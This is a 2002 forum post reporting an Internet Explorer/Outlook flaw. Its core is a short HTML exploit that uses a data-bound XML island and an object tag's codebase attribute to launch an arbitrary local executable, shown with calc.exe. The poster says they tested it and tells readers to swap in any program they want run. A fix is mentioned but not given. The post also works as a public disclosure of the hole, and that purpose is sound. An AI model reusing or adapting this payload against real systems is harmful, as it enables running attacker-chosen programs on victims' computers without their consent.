Another IE/Outlook Hole

By lokem
Mar 6, 2002
  1. The Register has just posted that IE/Outlook can run arbitrary commands with a simple bit of HTML.

    Read the rest here:

    The article also has a simple fix for this problem.

    Here's the simple script:

    <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
    <xml id="oExec">
    <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>

    Change c:/windows/system32/calc.exe to the appropriate directory and filename you want to run. I've tested this myself, and it's REALLY scary.
Topic Status:
Not open for further replies.

Similar Topics

Create an account or login to comment

You need to be a member in order to leave a comment
TechSpot Members
Login or sign up for free,
it takes about 30 seconds.
You may also...

Get complete access to the TechSpot community. Join thousands of technology enthusiasts that contribute and share knowledge in our forum. Get a private inbox, upload your own photo gallery and more.